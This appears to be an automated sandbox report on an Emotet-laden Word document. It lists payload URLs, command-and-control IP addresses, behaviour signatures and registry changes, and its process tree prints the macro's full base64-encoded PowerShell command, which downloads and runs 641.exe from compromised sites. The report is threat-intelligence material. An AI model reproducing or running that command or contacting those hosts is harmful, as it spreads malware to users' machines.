Analysis
-
max time kernel
30s -
max time network
24s -
resource
win7v191014 -
submitted
03-02-2020 20:36
General
Malware Config
Extracted
https://pixtravelers.com/wp-admin/eRLY/
http://jevelin.dongxanhshop.com/wp-admin/aw2mIU/
http://new.dongxanhshop.com/wp-admin/52HY48070/
http://demo.hbmonte.com/qkajzh322j/ApZ405/
http://redwingdemo.dukaafrica.com/wp-content/Ad4DFk/
Extracted
emotet
71.197.197.100:80
24.167.122.146:8080
104.131.41.185:8080
94.76.247.61:8080
181.36.42.205:443
72.29.55.174:80
82.196.15.205:8080
181.10.204.106:80
217.199.160.224:8080
58.171.38.26:80
200.58.83.179:80
192.241.146.84:8080
190.70.1.69:80
186.15.83.52:8080
216.251.83.79:80
62.75.160.178:8080
181.29.101.13:8080
190.6.193.152:8080
186.200.205.170:80
119.59.124.163:8080
144.139.228.113:443
204.225.249.100:7080
86.42.166.147:80
59.120.5.154:80
110.170.65.146:80
104.236.161.64:8080
94.200.126.42:80
190.210.236.139:80
185.94.252.13:443
185.94.252.12:80
37.120.185.153:443
58.162.218.151:80
191.103.76.34:443
120.150.247.164:80
24.18.202.68:80
186.68.48.204:443
144.139.91.187:80
172.104.169.32:8080
5.196.35.138:7080
82.8.232.51:80
185.243.92.42:8080
151.237.36.220:80
12.162.84.2:8080
202.62.39.111:80
190.210.184.138:995
37.187.6.63:8080
181.60.244.48:8080
177.103.159.44:80
146.255.96.214:443
74.101.225.121:443
70.184.69.146:80
2.45.112.134:80
190.101.144.224:80
207.154.204.40:8080
200.82.170.231:80
187.54.225.76:80
175.139.209.3:8080
91.83.93.124:7080
144.139.56.105:80
152.231.89.226:80
70.184.112.55:80
81.16.1.45:80
188.216.24.204:80
69.163.33.84:8080
190.186.164.23:80
94.176.234.118:443
189.78.156.8:80
80.11.158.65:8080
190.100.153.162:443
190.17.44.48:80
189.19.81.181:443
138.68.106.4:7080
68.174.15.223:80
191.183.21.190:80
79.7.158.208:80
190.191.82.216:80
178.79.163.131:8080
213.60.19.245:80
190.24.243.186:80
188.218.104.226:80
200.45.187.90:80
109.166.89.91:80
93.144.226.57:80
73.239.11.159:80
144.139.228.113:80
31.16.195.72:80
186.177.165.196:443
200.69.224.73:80
68.183.170.114:8080
175.114.178.83:443
46.28.111.142:7080
77.55.211.77:8080
125.99.61.162:7080
149.62.173.247:8080
190.195.129.227:8090
186.15.52.123:80
201.213.100.141:8080
189.201.197.98:8080
181.231.220.232:80
89.19.20.202:443
139.162.118.88:8080
181.30.61.163:80
87.106.46.107:8080
118.200.47.120:443
110.145.124.178:443
195.223.215.190:80
186.138.186.74:443
94.200.114.162:80
79.7.114.1:80
5.88.27.67:8080
190.219.149.236:80
192.241.143.52:8080
177.188.121.26:443
114.109.179.60:80
212.71.237.140:8080
203.25.159.3:8080
5.34.158.102:80
201.213.32.59:80
99.252.27.6:80
50.28.51.143:8080
91.242.136.103:80
187.162.248.237:80
200.123.183.137:443
177.242.21.126:80
203.45.161.179:443
81.213.78.151:443
188.135.15.49:80
Signatures
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
Processes:
PoWERsheLL.exepid process 1620 PoWERsheLL.exe -
Blacklisted process makes network request 2 IoCs
Processes:
PoWERsheLL.exeflow pid process 8 1620 PoWERsheLL.exe 10 1620 PoWERsheLL.exe -
Executes dropped EXE 2 IoCs
Processes:
641.exe641.exepid process 544 641.exe 1868 641.exe -
Suspicious use of WriteProcessMemory 1 IoCs
Processes:
641.exedescription pid process target process PID 544 wrote to memory of 1868 544 641.exe 641.exe -
Suspicious behavior: EmotetMutantsSpam 1 IoCs
Processes:
641.exepid process 1868 641.exe -
Suspicious use of SetWindowsHookEx 3 IoCs
Processes:
WINWORD.EXE641.exe641.exepid process 2036 WINWORD.EXE 544 641.exe 1868 641.exe -
Process spawned unexpected child process 1 IoCs
Processes:
PoWERsheLL.exedescription pid pid_target process target process Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1620 1408 PoWERsheLL.exe -
Office loads VBA resources, possible macro or embedded object present
-
Modifies registry class 280 IoCs
Processes:
WINWORD.EXEdescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Interface\{8BD21D42-EC42-11CE-9E0D-00AA006002F3}\ = "MdcCheckBoxEvents" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Wow6432Node\Interface\{47FF8FE1-6198-11CF-8CE8-00AA006CB389} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Interface\{8A683C91-BA84-11CF-8110-00A0C9030074}\ = "IReturnEffect" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Wow6432Node\Interface\{04598FC6-866C-11CF-AB7C-00AA00C08FCF} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Interface\{5512D113-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLImage" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Wow6432Node\Interface\{CF3F94A0-F546-11CE-9BCE-00AA00608E01}\ = "OptionFrameEvents" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Wow6432Node\Interface\{8BD21D23-EC42-11CE-9E0D-00AA006002F3} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Interface\{5512D111-5CC6-11CF-8D67-00AA00BDCE1D} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Interface\{4C599243-6926-101B-9992-00000B65C6F9}\ = "IImage" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Wow6432Node\Interface\{47FF8FE9-6198-11CF-8CE8-00AA006CB389} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Interface\{BEF6E003-A874-101A-8BBA-00AA00300CAB}\ = "Font" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Wow6432Node\Interface\{EC72F590-F375-11CE-B9E8-00AA006B1A69} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Interface\{47FF8FE9-6198-11CF-8CE8-00AA006CB389} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Wow6432Node\Interface\{04598FC6-866C-11CF-AB7C-00AA00C08FCF}\ = "IControl" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Interface\{47FF8FE0-6198-11CF-8CE8-00AA006CB389} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Wow6432Node\Interface\{92E11A03-7358-11CE-80CB-00AA00611080} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Wow6432Node\Interface\{8A683C90-BA84-11CF-8110-00A0C9030074}\ = "IReturnSingle" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Interface\{5512D115-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLReset" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Interface\{978C9E22-D4B0-11CE-BF2D-00AA003F40D0}\ = "LabelControlEvents" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Wow6432Node\Interface\{47FF8FE1-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents2" WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{8FDE364F-EB6A-46FA-BA2B-84547926CC41}\2.0\0 WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\TypeLib\{8FDE364F-EB6A-46FA-BA2B-84547926CC41}\2.0\FLAGS WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Wow6432Node\Interface\{8BD21D12-EC42-11CE-9E0D-00AA006002F3} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Wow6432Node\Interface\{04598FC1-866C-11CF-AB7C-00AA00C08FCF} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Wow6432Node\Interface\{8BD21D43-EC42-11CE-9E0D-00AA006002F3} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Wow6432Node\Interface\{8BD21D12-EC42-11CE-9E0D-00AA006002F3}\ = "MdcTextEvents" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Wow6432Node\Interface\{4C5992A5-6926-101B-9992-00000B65C6F9} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Interface\{47FF8FE3-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents4" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Wow6432Node\Interface\{8BD21D32-EC42-11CE-9E0D-00AA006002F3}\ = "MdcComboEvents" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Wow6432Node\Interface\{47FF8FE8-6198-11CF-8CE8-00AA006CB389} WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{8FDE364F-EB6A-46FA-BA2B-84547926CC41}\2.0\ = "Microsoft Forms 2.0 Object Library" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Interface\{82B02372-B5BC-11CF-810F-00A0C9030074}\ = "IReturnString" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Interface\{04598FC1-866C-11CF-AB7C-00AA00C08FCF} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Wow6432Node\Interface\{8BD21D32-EC42-11CE-9E0D-00AA006002F3} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Wow6432Node\Interface\{8BD21D62-EC42-11CE-9E0D-00AA006002F3} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Wow6432Node\Interface\{47FF8FE5-6198-11CF-8CE8-00AA006CB389} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Wow6432Node\Interface\{EC72F590-F375-11CE-B9E8-00AA006B1A69}\ = "IDataAutoWrapper" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Interface\{5512D117-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLCheckbox" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Interface\{7B020EC1-AF6C-11CE-9F46-00AA00574A4F} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Interface\{8BD21D22-EC42-11CE-9E0D-00AA006002F3}\ = "MdcListEvents" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Interface\{8BD21D42-EC42-11CE-9E0D-00AA006002F3} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Wow6432Node\Interface\{82B02371-B5BC-11CF-810F-00A0C9030074}\ = "IReturnBoolean" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Wow6432Node\Interface\{5512D11F-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLPassword" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Interface\{5512D123-5CC6-11CF-8D67-00AA00BDCE1D} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Wow6432Node\Interface\{5CEF5613-713D-11CE-80C9-00AA00611080}\ = "IPage" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Wow6432Node\Interface\{92E11A03-7358-11CE-80CB-00AA00611080}\ = "Pages" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Wow6432Node\Interface\{04598FC8-866C-11CF-AB7C-00AA00C08FCF}\ = "_UserForm" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Interface\{978C9E22-D4B0-11CE-BF2D-00AA003F40D0} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Wow6432Node\Interface\{8BD21D42-EC42-11CE-9E0D-00AA006002F3}\ = "MdcCheckBoxEvents" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Wow6432Node\Interface\{5512D117-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLCheckbox" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Wow6432Node\Interface\{978C9E22-D4B0-11CE-BF2D-00AA003F40D0} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Wow6432Node\Interface\{8BD21D52-EC42-11CE-9E0D-00AA006002F3}\ = "MdcOptionButtonEvents" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Interface\{BEF6E003-A874-101A-8BBA-00AA00300CAB} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Interface\{82B02370-B5BC-11CF-810F-00A0C9030074}\ = "IReturnInteger" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Wow6432Node\Interface\{A38BFFC3-A5A0-11CE-8107-00AA00611080} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Interface\{04598FC1-866C-11CF-AB7C-00AA00C08FCF}\ = "ILabelControl" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Interface\{8BD21D63-EC42-11CE-9E0D-00AA006002F3}\ = "IMdcToggleButton" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Wow6432Node WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Wow6432Node\Interface\{82B02372-B5BC-11CF-810F-00A0C9030074} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Interface\{92E11A03-7358-11CE-80CB-00AA00611080} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Interface\{5B9D8FC8-4A71-101B-97A6-00000B65C08B}\ = "FormEvents" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Interface\{8BD21D32-EC42-11CE-9E0D-00AA006002F3}\ = "MdcComboEvents" WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{8FDE364F-EB6A-46FA-BA2B-84547926CC41}\2.0\FLAGS WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Interface\{82B02372-B5BC-11CF-810F-00A0C9030074} WINWORD.EXE -
Drops file in System32 directory 2 IoCs
Processes:
PoWERsheLL.exe641.exedescription ioc process File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk PoWERsheLL.exe File renamed C:\Users\Admin\641.exe => C:\Windows\SysWOW64\digitalcards.exe 641.exe -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
Processes:
WINWORD.EXEpid process 2036 WINWORD.EXE -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
PoWERsheLL.exedescription pid process Token: SeDebugPrivilege 1620 PoWERsheLL.exe
Processes
-
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\4a1ca5cc92993b021789cf042d7e09f22a82e3f47f3b86d30e05d607ec41f500.doc"1⤵
- Suspicious use of SetWindowsHookEx
- Modifies registry class
- Suspicious behavior: AddClipboardFormatListener
PID:2036
-
C:\Windows\System32\WindowsPowerShell\v1.0\PoWERsheLL.exePoWERsheLL -e JABJAGIAawB5AGMAcgBzAG4AaQA9ACcAUwB1AHgAaAB4AG0AYQBiAG8AJwA7ACQARwBtAG8AZABuAGcAawBtAGwAaQBtAHAAaQAgAD0AIAAnADYANAAxACcAOwAkAEEAaQBsAG0AYQB2AGQAZABpAHAAeABoAD0AJwBaAGgAaABuAHkAZgBpAGcAbwBwACcAOwAkAFEAdAByAGsAZgBwAHoAdgB5AD0AJABlAG4AdgA6AHUAcwBlAHIAcAByAG8AZgBpAGwAZQArACcAXAAnACsAJABHAG0AbwBkAG4AZwBrAG0AbABpAG0AcABpACsAJwAuAGUAeABlACcAOwAkAEwAYQBwAGgAZwByAGUAaQBrAD0AJwBGAHMAcgBmAHIAeQBkAHgAcQBqAG0AJwA7ACQASgBrAHkAcwBjAHcAYQBrAHEAawA9AC4AKAAnAG4AZQB3ACcAKwAnAC0AbwBiAGoAJwArACcAZQBjAHQAJwApACAAbgBlAHQALgBXAGUAYgBjAEwAaQBFAE4AVAA7ACQAWQBuAHoAcQBmAHMAegBvAHkAZAB6AG0AZwA9ACcAaAB0AHQAcABzADoALwAvAHAAaQB4AHQAcgBhAHYAZQBsAGUAcgBzAC4AYwBvAG0ALwB3AHAALQBhAGQAbQBpAG4ALwBlAFIATABZAC8AKgBoAHQAdABwADoALwAvAGoAZQB2AGUAbABpAG4ALgBkAG8AbgBnAHgAYQBuAGgAcwBoAG8AcAAuAGMAbwBtAC8AdwBwAC0AYQBkAG0AaQBuAC8AYQB3ADIAbQBJAFUALwAqAGgAdAB0AHAAOgAvAC8AbgBlAHcALgBkAG8AbgBnAHgAYQBuAGgAcwBoAG8AcAAuAGMAbwBtAC8AdwBwAC0AYQBkAG0AaQBuAC8ANQAyAEgAWQA0ADgAMAA3ADAALwAqAGgAdAB0AHAAOgAvAC8AZABlAG0AbwAuAGgAYgBtAG8AbgB0AGUALgBjAG8AbQAvAHEAawBhAGoAegBoADMAMgAyAGoALwBBAHAAWgA0ADAANQAvACoAaAB0AHQAcAA6AC8ALwByAGUAZAB3AGkAbgBnAGQAZQBtAG8ALgBkAHUAawBhAGEAZgByAGkAYwBhAC4AYwBvAG0ALwB3AHAALQBjAG8AbgB0AGUAbgB0AC8AQQBkADQARABGAGsALwAnAC4AIgBTAFAAYABsAEkAdAAiACgAWwBjAGgAYQByAF0ANAAyACkAOwAkAFUAYQBzAHgAawB1AHUAdgB5AHcAawBkAD0AJwBJAGYAYwBvAGEAagBxAGMAJwA7AGYAbwByAGUAYQBjAGgAKAAkAEsAYgB2AGMAcgB3AG4AcAB3AHkAIABpAG4AIAAkAFkAbgB6AHEAZgBzAHoAbwB5AGQAegBtAGcAKQB7AHQAcgB5AHsAJABKAGsAeQBzAGMAdwBhAGsAcQBrAC4AIgBkAG8AYAB3AE4ATABgAE8AYQBEAGYASQBsAEUAIgAoACQASwBiAHYAYwByAHcAbgBwAHcAeQAsACAAJABRAHQAcgBrAGYAcAB6AHYAeQApADsAJABBAHEAaABrAHMAeAB2AHoAbgA9ACcARwB6AGcAeQBxAHcAdgBoAHcAaAAnADsASQBmACAAKAAoAC4AKAAnAEcAJwArACcAZQB0AC0ASQB0AGUAbQAnACkAIAAkAFEAdAByAGsAZgBwAHoAdgB5ACkALgAiAGwAZQBgAE4ARwBgAFQASAAiACAALQBnAGUAIAAyADEAMwA4ADkAKQAgAHsAKABbAHcAbQBpAGMAbABhAHMAcwBdACcAdwBpAG4AMwAyAF8AUAByAG8AYwBlAHMAcwAnACkALgAiAGMAUgBgAEUAQQBgAFQAZQAiACgAJABRAHQAcgBrAGYAcAB6AHYAeQApADsAJABWAHIAbwB1AGwAZABiAHMAZgBsAHgAdQBtAD0AJwBBAGEAawBwAHEAbwBjAGcAJwA7AGIAcgBlAGEAawA7ACQASgBuAHYAdQB6AHkAeQBtAGsAcABhAD0AJwBOAGsAdgB1AGEAbgBpAGQAJwB9AH0AYwBhAHQAYwBoAHsAfQB9ACQAUgBnAHYAdwBtAG0AaQBzAGwAcwA9ACcAUQBnAHgAZgBtAHoAaABjACcA1⤵
- Suspicious behavior: EnumeratesProcesses
- Blacklisted process makes network request
- Process spawned unexpected child process
- Drops file in System32 directory
- Suspicious use of AdjustPrivilegeToken
PID:1620
-
C:\Users\Admin\641.exeC:\Users\Admin\641.exe1⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
- Suspicious use of SetWindowsHookEx
PID:544 -
C:\Users\Admin\641.exe--ba05ca912⤵
- Executes dropped EXE
- Suspicious behavior: EmotetMutantsSpam
- Suspicious use of SetWindowsHookEx
- Drops file in System32 directory
PID:1868
-